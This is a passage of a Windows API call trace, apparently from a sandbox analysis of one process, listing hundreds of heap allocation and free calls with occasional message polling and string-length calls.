lpMem=0x2a79308 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef1c0 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef280 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef160 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a98 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0084.403] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef160 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef160 | out: hHeap=0x2af0000) returned 1 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f98 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b48 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78ef8 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729b8 [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef310 | out: hHeap=0x2af0000) returned 1 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f70 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef280 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b38 [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78fe8 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b98 [0084.404] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78fe8 | out: hHeap=0x2af0000) returned 1 [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef160 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ad8 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b98 [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef508 [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef5f8 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79010 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ad8 [0084.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78fe8 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0084.404] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b98 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79038 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ae8 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78ea8 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a792e0 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79038 | out: hHeap=0x2af0000) returned 1 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.405] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79060 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efc10 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0084.406] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a78 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b98 [0084.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efec8 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a78 | out: hHeap=0x2af0000) returned 1 [0084.407] lstrlenW (lpString="20") returned 2 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efec8 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa30 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.407] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.407] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b98 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efec8 [0084.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efec8 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.408] lstrlenW (lpString="31") returned 2 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa30 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0084.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.408] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.408] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a88 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efec8 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a98 [0084.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efec8 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa30 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0084.409] lstrlenW (lpString="20") returned 2 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a98 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b68 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa30 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.410] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0084.410] PeekMessageW (in: lpMsg=0x8ceb68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceb68) returned 0 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78fe8 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79010 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efc10 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: 